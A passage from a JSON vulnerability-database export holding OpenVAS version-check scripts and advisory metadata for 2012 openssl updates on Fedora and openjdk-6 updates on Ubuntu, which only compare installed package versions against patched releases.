exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.0i~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-08T12:58:21", "description": "Check for the Version of openssl", "cvss3": {}, "published": "2012-06-04T00:00:00", "type": "openvas", "title": "Fedora Update for openssl FEDORA-2012-8014", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2333", "CVE-2012-1165", "CVE-2012-0050", "CVE-2012-2110", "CVE-2012-0884"], "modified": "2018-01-08T00:00:00", "id": "OPENVAS:864279", "href": "http://plugins.openvas.org/nasl.php?oid=864279", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for openssl FEDORA-2012-8014\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"openssl on Fedora 16\";\ntag_insight = \"The OpenSSL toolkit provides support for secure communications between\n machines. OpenSSL includes a certificate management tool and shared\n libraries which provide various cryptographic algorithms and\n protocols.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/081711.html\");\n script_id(864279);\n script_version(\"$Revision: 8313 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-08 08:02:11 +0100 (Mon, 08 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-04 11:06:57 +0530 (Mon, 04 Jun 2012)\");\n script_cve_id(\"CVE-2012-2333\", \"CVE-2012-2110\", \"CVE-2012-0884\", \"CVE-2012-1165\",\n \"CVE-2012-0050\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-8014\");\n script_name(\"Fedora Update for openssl FEDORA-2012-8014\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of openssl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.0j~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-03T10:58:11", "description": "Check for the Version of openssl", "cvss3": {}, "published": "2012-06-04T00:00:00", "type": "openvas", "title": "Fedora Update for openssl FEDORA-2012-8024", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2333", "CVE-2012-1165", "CVE-2012-0050", "CVE-2012-2110", "CVE-2012-0884", "CVE-2011-3207"], "modified": "2018-01-03T00:00:00", "id": "OPENVAS:864283", "href": "http://plugins.openvas.org/nasl.php?oid=864283", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for openssl FEDORA-2012-8024\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"openssl on Fedora 15\";\ntag_insight = \"The OpenSSL toolkit provides support for secure communications between\n machines. OpenSSL includes a certificate management tool and shared\n libraries which provide various cryptographic algorithms and\n protocols.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/081718.html\");\n script_id(864283);\n script_version(\"$Revision: 8273 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 07:29:19 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-04 11:07:26 +0530 (Mon, 04 Jun 2012)\");\n script_cve_id(\"CVE-2012-2333\", \"CVE-2012-2110\", \"CVE-2012-0884\", \"CVE-2012-1165\",\n \"CVE-2012-0050\", \"CVE-2011-3207\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-8024\");\n script_name(\"Fedora Update for openssl FEDORA-2012-8024\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of openssl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.0j~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:55", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-06-04T00:00:00", "type": "openvas", "title": "Fedora Update for openssl FEDORA-2012-8024", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2333", "CVE-2012-1165", "CVE-2012-0050", "CVE-2012-2110", "CVE-2012-0884", "CVE-2011-3207"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864283", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864283", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for openssl FEDORA-2012-8024\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/081718.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864283\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-04 11:07:26 +0530 (Mon, 04 Jun 2012)\");\n script_cve_id(\"CVE-2012-2333\", \"CVE-2012-2110\", \"CVE-2012-0884\", \"CVE-2012-1165\",\n \"CVE-2012-0050\", \"CVE-2011-3207\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-8024\");\n script_name(\"Fedora Update for openssl FEDORA-2012-8024\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"openssl on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.0j~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:49", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1373-2", "cvss3": {}, "published": "2012-03-07T00:00:00", "type": "openvas", "title": "Ubuntu Update for openjdk-6b18 USN-1373-2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3563", "CVE-2012-0507", "CVE-2012-0503", "CVE-2011-5035", "CVE-2012-0506", "CVE-2012-0497", "CVE-2012-0505", "CVE-2012-0501", "CVE-2012-0502"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310840919", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840919", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1373_2.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for openjdk-6b18 USN-1373-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1373-2/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840919\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-07 11:19:39 +0530 (Wed, 07 Mar 2012)\");\n script_cve_id(\"CVE-2011-5035\", \"CVE-2011-3563\", \"CVE-2012-0497\", \"CVE-2012-0501\",\n \"CVE-2012-0502\", \"CVE-2012-0503\", \"CVE-2012-0505\", \"CVE-2012-0506\",\n \"CVE-2012-0507\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"USN\", value:\"1373-2\");\n script_name(\"Ubuntu Update for openjdk-6b18 USN-1373-2\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(10\\.10|10\\.04 LTS|11\\.04)\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1373-2\");\n script_tag(name:\"affected\", value:\"openjdk-6b18 on Ubuntu 11.04,\n Ubuntu 10.10,\n Ubuntu 10.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"USN 1373-1 fixed vulnerabilities in OpenJDK 6 in Ubuntu 10.04 LTS,\n Ubuntu 10.10 and Ubuntu 11.04 for all architectures except for ARM\n (armel). This provides the corresponding OpenJDK 6 update for use\n with the ARM (armel) architecture in Ubuntu 10.04 LTS, Ubuntu 10.10\n and Ubuntu 11.04.\n\n Original advisory details:\n\n It was discovered that the Java HttpServer class did not limit the\n number of headers read from a HTTP request. A remote attacker could\n cause a denial of service by sending special requests that trigger\n hash collisions predictably. (CVE-2011-5035)\n\n ATTENTION: this update changes previous Java HttpServer class behavior\n by limiting the number of request headers to 200. This may be increased\n by adjusting the sun.net.httpserver.maxReqHeaders property.\n\n It was discovered that the Java Sound component did not properly\n check buffer boundaries. A remote attacker could use this to cause\n a denial of service or view confidential data. (CVE-2011-3563)\n\n It was discovered that the Java2D implementation does not properly\n check graphics rendering objects before passing them to the native\n renderer. A remote attacker could use this to cause a denial of\n service or to bypass Java sandbox restrictions. (CVE-2012-0497)\n\n It was discovered that an off-by-one error exists in the Java ZIP\n file processing code. An attacker could us this to cause a denial of\n service through a maliciously crafted ZIP file. (CVE-2012-0501)\n\n It was discovered that the Java AWT KeyboardFocusManager did not\n properly enforce keyboard focus security policy. A remote attacker\n could use this with an untrusted application or applet to grab keyboard\n focus and possibly expose confidential data. (CVE-2012-0502)\n\n It was discovered that the Java TimeZone class did not properly enforce\n security policy around setting the default time zone. A remote attacker\n could use this with an untrusted application or applet to set a new\n default time zone and bypass Java sandbox restrictions. (CVE-2012-0503)\n\n It was discovered the Java ObjectStreamClass did not throw\n an accurately identifiable exception when a deserialization\n failure occurred. A remote attacker could use this with\n an untrusted application or applet to bypass Java sandbox\n restrictions. (CVE-2012-0505)\n\n It was discovered that the Java CORBA implementation did not properly\n protect repository identifiers on certain CORBA objects. A remote\n attacker could use this to corrupt object data. (CVE-2012-0506)\n\n It was discovered that the Java AtomicReferenceArray c ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao\", ver:\"6b18-1.8.13-0ubuntu1~10.10.1\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b18-1.8.13-0ubuntu1~10.10.1\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b18-1.8.13-0ubuntu1~10.10.1\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero\", ver:\"6b18-1.8.13-0ubuntu1~10.10.1\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao\", ver:\"6b18-1.8.13-0ubuntu1~10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b18-1.8.13-0ubuntu1~10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b18-1.8.13-0ubuntu1~10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero\", ver:\"6b18-1.8.13-0ubuntu1~10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao\", ver:\"6b18-1.8.13-0ubuntu1~11.04.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-jamvm\", ver:\"6b18-1.8.13-0ubuntu1~11.04.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b18-1.8.13-0ubuntu1~11.04.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b18-1.8.13-0ubuntu1~11.04.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero\", ver:\"6b18-1.8.13-0ubuntu1~11.04.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-04T11:19:35", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1373-1", "cvss3": {}, "published": "2012-03-09T00:00:00", "type": "openvas", "title": "Ubuntu Update for openjdk-6 USN-1373-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3563", "CVE-2012-0507", "CVE-2012-0503", "CVE-2011-5035", "CVE-2012-0506", "CVE-2012-0497", "CVE-2012-0505", "CVE-2012-0501", "CVE-2012-0502"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:840909", "href": "http://plugins.openvas.org/nasl.php?oid=840909", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1373_1.nasl 7960 2017-12-01 06:58:16Z santu $\n#\n# Ubuntu Update for openjdk-6 USN-1373-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that the Java HttpServer class did not limit the\n number of headers read from a HTTP request. A remote attacker could\n cause a denial of service by sending special requests that trigger\n hash collisions predictably. (CVE-2011-5035)\n\n ATTENTION: this update changes previous Java HttpServer class behavior\n by limiting the number of request headers to 200. This may be increased\n by adjusting the sun.net.httpserver.maxReqHeaders property.\n\n It was discovered that the Java Sound component did not properly\n check buffer boundaries. A remote attacker could use this to cause\n a denial of service or view confidential data. (CVE-2011-3563)\n\n It was discovered that the Java2D implementation does not properly\n check graphics rendering objects before passing them to the native\n renderer. A remote attacker could use this to cause a denial of\n service or to bypass Java sandbox restrictions. (CVE-2012-0497)\n\n It was discovered that an off-by-one error exists in the Java ZIP\n file processing code. An attacker could us this to cause a denial of\n service through a maliciously crafted ZIP file. (CVE-2012-0501)\n\n It was discovered that the Java AWT KeyboardFocusManager did not\n properly enforce keyboard focus security policy. A remote attacker\n could use this with an untrusted application or applet to grab keyboard\n focus and possibly expose confidential data. (CVE-2012-0502)\n\n It was discovered that the Java TimeZone class did not properly enforce\n security policy around setting the default time zone. A remote attacker\n could use this with an untrusted application or applet to set a new\n default time zone and bypass Java sandbox restrictions. (CVE-2012-0503)\n\n It was discovered the Java ObjectStreamClass did not throw\n an accurately identifiable exception when a deserialization\n failure occurred. A remote attacker could use this with\n an untrusted application or applet to bypass Java sandbox\n restrictions. (CVE-2012-0505)\n\n It was discovered that the Java CORBA implementation did not properly\n protect repository identifiers on certain CORBA objects. A remote\n attacker could use this to corrupt object data. (CVE-2012-0506)\n\n It was discovered that the Java AtomicReferenceArray class\n implementation did not properly check if an array was of\n the expected Object[] type. A remote attacker could use this\n with a malicious application or applet to bypass Java sandbox\n restrictions. (CVE-2012-0507)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1373-1\";\ntag_affected = \"openjdk-6 on Ubuntu 11.04 ,\n Ubuntu 10.10 ,\n Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1373-1/\");\n script_id(840909);\n script_version(\"$Revision: 7960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:58:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-09 18:57:39 +0530 (Fri, 09 Mar 2012)\");\n script_cve_id(\"CVE-2011-5035\", \"CVE-2011-3563\", \"CVE-2012-0497\", \"CVE-2012-0501\",\n \"CVE-2012-0502\", \"CVE-2012-0503\", \"CVE-2012-0505\", \"CVE-2012-0506\",\n \"CVE-2012-0507\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1373-1\");\n script_name(\"Ubuntu Update for openjdk-6 USN-1373-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao\", ver:\"6b20-1.9.13-0ubuntu1~10.10.1\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b20-1.9.13-0ubuntu1~10.10.1\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b20-1.9.13-0ubuntu1~10.10.1\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-lib\", ver:\"6b20-1.9.13-0ubuntu1~10.10.1\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero\", ver:\"6b20-1.9.13-0ubuntu1~10.10.1\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao\", ver:\"6b20-1.9.13-0ubuntu1~10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b20-1.9.13-0ubuntu1~10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b20-1.9.13-0ubuntu1~10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-lib\", ver:\"6b20-1.9.13-0ubuntu1~10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero\", ver:\"6b20-1.9.13-0ubuntu1~10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao\", ver:\"6b22-1.10.6-0ubuntu1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-jamvm\", ver:\"6b22-1.10.6-0ubuntu1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b22-1.10.6-0ubuntu1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b22-1.10.6-0ubuntu1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-lib\", ver:\"6b22-1.10.6-0ubuntu1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero\", ver:\"6b22-1.10.6-0ubuntu1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:20:05", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1373-2", "cvss3": {}, "published": "2012-03-07T00:00:00", "type": "openvas", "title": "Ubuntu Update for openjdk-6b18 USN-1373-2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3563", "CVE-2012-0507", "CVE-2012-0503", 